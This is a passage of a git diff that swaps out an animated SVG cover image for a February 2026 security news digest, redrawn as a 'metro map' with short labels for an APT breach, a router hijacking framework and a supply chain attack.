37h1v1h-1zM40 37h1v1h-1zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM9 38h3v1h-3zM14 38h1v1h-1zM16 38h3v1h-3zM20 38h1v1h-1zM23 38h1v1h-1zM25 38h4v1h-4zM31 38h1v1h-1zM33 38h1v1h-1zM37 38h2v1h-2zM40 38h1v1h-1zM0 39h1v1h-1zM6 39h1v1h-1zM13 39h2v1h-2zM19 39h1v1h-1zM21 39h1v1h-1zM23 39h1v1h-1zM26 39h1v1h-1zM29 39h2v1h-2zM32 39h4v1h-4zM37 39h1v1h-1zM39 39h2v1h-2zM0 40h7v1h-7zM8 40h2v1h-2zM12 40h1v1h-1zM16 40h7v1h-7zM24 40h1v1h-1zM29 40h1v1h-1zM31 40h9v1h-9z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-07-Tech_Security_Weekly_Digest_AI_Malware_Go_Security.svg
+++ b/assets/images/2026-02-07-Tech_Security_Weekly_Digest_AI_Malware_Go_Security.svg
@@ -1,134 +1,397 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 07, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Weekly metro map: APT TGR-STA-1030, DKnife AitM Router Attack, dYdX Supply Chain">
+<title>APT TGR-STA-1030 37-Nation Breach, DKnife AitM Router Hijack, dYdX Supply Chain Attack</title>
+<!-- profile: high-quality-cover (L21 Metro Map, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#080E1E"/>
+    <stop offset="50%" stop-color="#0A1228"/>
+    <stop offset="100%" stop-color="#0D1632"/>
+  </linearGradient>
+  <radialGradient id="pulseRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF4D5E" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#E63946" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFC43D" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#FFA107" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#FFA107" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseCyan" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#5FD3F3" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#2AA8CE" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#2AA8CE" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="30" height="30" patternUnits="userSpaceOnUse">
+    <circle cx="15" cy="15" r="0.7" fill="#2E3A66" opacity="0.55"/>
+  </pattern>
+  <filter id="stationShadow" x="-20%" y="-20%" width="140%" height="140%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.2"/>
+    <feOffset dx="0" dy="2"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.6"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="120%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1"/>
+    <feOffset dx="1" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="glowRed" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowAmber" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowCyan" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+<filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%"><feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/><feOffset dx="1" dy="3"/><feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer><feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge></filter></defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgGrad)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Subtle map guides -->
+<g opacity="0.10" stroke="#4A6AA0" stroke-width="0.6" fill="none">
+  <line x1="0" y1="170" x2="1200" y2="170">
+    <animate attributeName="opacity" values="0.06;0.16;0.06" dur="6s" repeatCount="indefinite"/>
+  </line>
+  <line x1="0" y1="330" x2="1200" y2="330">
+    <animate attributeName="opacity" values="0.06;0.16;0.06" dur="6s" repeatCount="indefinite" begin="1s"/>
+  </line>
+  <line x1="0" y1="490" x2="1200" y2="490">
+    <animate attributeName="opacity" values="0.06;0.16;0.06" dur="6s" repeatCount="indefinite" begin="2s"/>
+  </line>
+  <line x1="200" y1="0" x2="200" y2="630"/>
+  <line x1="480" y1="0" x2="480" y2="630"/>
+  <line x1="760" y1="0" x2="760" y2="630"/>
+  <line x1="1020" y1="0" x2="1020" y2="630"/>
+</g>
+
+<!-- Header bar -->
+<rect x="0" y="0" width="1200" height="90" fill="#0A1430" opacity="0.85"/>
+
+<!-- Title -->
+<g filter="url(#textShadow)">
+  <text x="60" y="40" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#6A88C8" letter-spacing="2">TECH SECURITY WEEKLY DIGEST</text>
+  <text x="60" y="70" font-family="Helvetica, Arial, sans-serif" font-size="24" font-weight="900" fill="#E9EEF8" letter-spacing="0.5">
+    APT Breach  |  AitM Router  |  Supply Chain
+    <animate attributeName="fill" values="#E9EEF8;#8FB8FF;#E9EEF8" dur="7s" repeatCount="indefinite"/>
+  </text>
+</g>
+
+<!-- Date badge -->
+<g transform="translate(820,45)">
+  <rect x="0" y="-22" width="120" height="34" rx="8" fill="#14213E" stroke="#3A4E82" stroke-width="1.2"/>
+  <text x="60" y="6" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="800" fill="#8FB8FF" text-anchor="middle">2026.02.07</text>
+</g>
+
+<!-- Legend top-right -->
+<g transform="translate(972,12)" filter="url(#textShadow)">
+  <rect x="0" y="0" width="212" height="68" rx="10" fill="#14213E" stroke="#3A4E82" stroke-width="1.2">
+    <animate attributeName="stroke-opacity" values="0.6;1;0.6" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <circle cx="16" cy="20" r="5" fill="#E63946">
+    <animate attributeName="r" values="5;6.5;5" dur="2s" repeatCount="indefinite"/>
+  </circle>
+  <text x="28" y="25" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E9EEF8">CRITICAL</text>
+  <circle cx="108" cy="20" r="5" fill="#FFA107">
+    <animate attributeName="r" values="5;6.5;5" dur="2.4s" repeatCount="indefinite"/>
+  </circle>
+  <text x="120" y="25" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E9EEF8">HIGH</text>
+  <circle cx="16" cy="50" r="5" fill="#5FD3F3">
+    <animate attributeName="r" values="5;6.5;5" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <text x="28" y="55" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E9EEF8">MEDIUM</text>
+  <circle cx="108" cy="50" r="5" fill="#FFFFFF" stroke="#6A88C8" stroke-width="1.5"/>
+  <text x="120" y="55" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E9EEF8">STATION</text>
+</g>
+
+<!-- ==================== LINE 1: APT TGR-STA-1030 (RED) ==================== -->
+<g>
+  <line x1="120" y1="170" x2="1080" y2="170" stroke="#E63946" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowRed)">
+    <animate attributeName="opacity" values="0.18;0.38;0.18" dur="3.5s" repeatCount="indefinite"/>
+  </line>
+  <line x1="120" y1="170" x2="1080" y2="170" stroke="#E63946" stroke-width="9" stroke-linecap="round"/>
+
+  <g transform="translate(62,170)" filter="url(#textShadow)">
+    <rect x="-16" y="-16" width="52" height="32" rx="7" fill="#E63946">
+      <animate attributeName="fill" values="#E63946;#FF6B7A;#E63946" dur="4s" repeatCount="indefinite"/>
+    </rect>
+    <text x="10" y="7" font-family="Helvetica, Arial, sans-serif" font-size="17" font-weight="900" fill="#FFFFFF" text-anchor="middle">L1</text>
   </g>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
+  <circle r="9" fill="#FFE1E4" stroke="#FFFFFF" stroke-width="2.5">
+    <animate attributeName="cx" values="140;1080;140" dur="10s" repeatCount="indefinite"/>
+    <animate attributeName="cy" values="170;170;170" dur="10s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="10s" repeatCount="indefinite"/>
+  </circle>
 
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <!-- Station 1A -->
+  <g transform="translate(200,170)">
+    <circle r="22" fill="url(#pulseRed)">
+      <animate attributeName="r" values="22;32;22" dur="2.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.55;0.9;0.55" dur="2.8s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#080E1E" stroke="#E63946" stroke-width="4.5" filter="url(#stationShadow)"/>
+    <circle r="4.5" fill="#FF4D5E">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.4s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 07, 2026</text>
+  <g filter="url(#textShadow)">
+    <text x="200" y="133" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#FFFFFF" text-anchor="middle">TGR-STA-1030</text>
+    <text x="200" y="150" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFB8BE" text-anchor="middle">Asian APT</text>
+    <text x="200" y="210" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E63946" text-anchor="middle">37 Nations</text>
+  </g>
 
-  <!-- Card 1: AI AGENT -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#ef4444" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#ef4444" stroke-width="1.2" opacity="0.5"/>
+  <!-- Station 1B -->
+  <g transform="translate(400,170)">
+    <circle r="13" fill="#080E1E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#E63946">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2s" repeatCount="indefinite"/>
+      <animate attributeName="r" values="5;7;5" dur="2s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
+  <g filter="url(#textShadow)">
+    <text x="400" y="133" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFE1E4" text-anchor="middle">70+ Gov Infra</text>
+    <text x="400" y="150" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFB8BE" text-anchor="middle">Mass Breach</text>
+    <text x="400" y="210" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="800" fill="#E63946" text-anchor="middle">CRITICAL</text>
   </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: THREAT INT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <!-- Card 5: PATCH MGT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <path d="M0,-18 L16,12 L-16,12 Z" fill="none" stroke="#22d3ee" stroke-width="1.8"/><text x="0" y="6" font-family="Courier New" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">CVE</text>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
 
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+  <!-- Station 1C -->
+  <g transform="translate(610,170)">
+    <circle r="13" fill="#080E1E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FF6B7A">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="1.8s" repeatCount="indefinite"/>
+    </circle>
   </g>
-  <!-- Node: AI AGENT -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">AI</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">THRE</text>
-  <!-- Node: PATCH MGT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">PATC</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
+  <g filter="url(#textShadow)">
+    <text x="610" y="133" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFE1E4" text-anchor="middle">Lateral Move</text>
+    <text x="610" y="150" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFB8BE" text-anchor="middle">Persistence</text>
+    <text x="610" y="210" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#CC8888" text-anchor="middle">T1021/T1098</text>
+  </g>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+  <!-- Station 1D -->
+  <g transform="translate(820,170)">
+    <circle r="13" fill="#080E1E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FF6B7A">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.2s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="820" y="133" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFE1E4" text-anchor="middle">Exfiltration</text>
+    <text x="820" y="150" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFB8BE" text-anchor="middle">Data Theft</text>
+    <text x="820" y="210" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#CC8888" text-anchor="middle">T1041</text>
+  </g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="92" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="78" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">AI AGENT</text>
-  <rect x="136" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="177" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="231" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="281" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="344" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="399" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <rect x="466" y="490" width="101" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="516" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">PATCH MGT</text>
+  <!-- Station 1E -->
+  <g transform="translate(1040,170)">
+    <circle r="13" fill="#080E1E" stroke="#B02030" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FF4D5E">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.6s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="1040" y="133" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFE1E4" text-anchor="middle">Remediate</text>
+    <text x="1040" y="150" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFB8BE" text-anchor="middle">IOC Block</text>
+    <text x="1040" y="210" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#E63946" text-anchor="middle">Patch Now</text>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 07, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- ==================== LINE 2: DKnife AitM (AMBER) ==================== -->
+<g>
+  <line x1="120" y1="330" x2="1080" y2="330" stroke="#FFA107" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowAmber)">
+    <animate attributeName="opacity" values="0.18;0.38;0.18" dur="4s" repeatCount="indefinite"/>
+  </line>
+  <line x1="120" y1="330" x2="1080" y2="330" stroke="#FFA107" stroke-width="9" stroke-linecap="round"/>
+
+  <g transform="translate(62,330)" filter="url(#textShadow)">
+    <rect x="-16" y="-16" width="52" height="32" rx="7" fill="#FFA107">
+      <animate attributeName="fill" values="#FFA107;#FFC43D;#FFA107" dur="4.5s" repeatCount="indefinite"/>
+    </rect>
+    <text x="10" y="7" font-family="Helvetica, Arial, sans-serif" font-size="17" font-weight="900" fill="#080E1E" text-anchor="middle">L2</text>
+  </g>
+
+  <circle r="9" fill="#FFF3CC" stroke="#FFFFFF" stroke-width="2.5">
+    <animate attributeName="cx" values="1080;140;1080" dur="11s" repeatCount="indefinite"/>
+    <animate attributeName="cy" values="330;330;330" dur="11s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0;1;1;1;0" dur="11s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- Station 2A -->
+  <g transform="translate(200,330)">
+    <circle r="22" fill="url(#pulseAmber)">
+      <animate attributeName="r" values="22;32;22" dur="3s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.55;0.9;0.55" dur="3s" repeatCount="indefinite"/>
+    </circle>
+    <circle r="13" fill="#080E1E" stroke="#FFA107" stroke-width="4.5" filter="url(#stationShadow)"/>
+    <circle r="4.5" fill="#FFC43D">
+      <animate attributeName="opacity" values="1;0.3;1" dur="1.6s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="200" y="293" font-family="Helvetica, Arial, sans-serif" font-size="15" font-weight="900" fill="#FFF3CC" text-anchor="middle">DKnife</text>
+    <text x="200" y="310" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFD97A" text-anchor="middle">China-Linked</text>
+    <text x="200" y="370" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFA107" text-anchor="middle">AitM Framework</text>
+  </g>
+
+  <!-- Station 2B -->
+  <g transform="translate(400,330)">
+    <circle r="13" fill="#080E1E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FFC43D">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.1s" repeatCount="indefinite"/>
+      <animate attributeName="r" values="5;7;5" dur="2.1s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="400" y="293" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFF3CC" text-anchor="middle">Router Target</text>
+    <text x="400" y="310" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFD97A" text-anchor="middle">Edge Device</text>
+    <text x="400" y="370" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#CC9900" text-anchor="middle">T1557</text>
+  </g>
+
+  <!-- Station 2C -->
+  <g transform="translate(610,330)">
+    <circle r="13" fill="#080E1E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FFA107">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="1.9s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="610" y="293" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFF3CC" text-anchor="middle">Traffic Hijack</text>
+    <text x="610" y="310" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFD97A" text-anchor="middle">MitM Active</text>
+    <text x="610" y="370" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFA107" text-anchor="middle">HIGH</text>
+  </g>
+
+  <!-- Station 2D -->
+  <g transform="translate(820,330)">
+    <circle r="13" fill="#080E1E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FFA107">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.3s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="820" y="293" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFF3CC" text-anchor="middle">Cred Harvest</text>
+    <text x="820" y="310" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFD97A" text-anchor="middle">Session Token</text>
+    <text x="820" y="370" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#CC9900" text-anchor="middle">T1539</text>
+  </g>
+
+  <!-- Station 2E -->
+  <g transform="translate(1040,330)">
+    <circle r="13" fill="#080E1E" stroke="#CC8000" stroke-width="4" filter="url(#stationShadow)"/>
+    <circle r="5" fill="#FFA107">
+      <animate attributeName="opacity" values="0.5;1;0.5" dur="2.7s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+  <g filter="url(#textShadow)">
+    <text x="1040" y="293" font-family="Helvetica, Arial, sans-serif" font-size="14" font-weight="800" fill="#FFF3CC" text-anchor="middle">Zero Trust</text>
+    <text x="1040" y="310" font-family="Helvetica, Arial, sans-serif" font-size="11" font-weight="600" fill="#FFD97A" text-anchor="middle">Segment Net</text>
+    <text x="1040" y="370" font-family="Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#FFA107" text-anchor="middle">Mitigate</text>
+  </g>
+</g>
+
+<!-- ==================== LINE 3: dYdX Supply Chain (CYAN) ==================== -->
+<g>
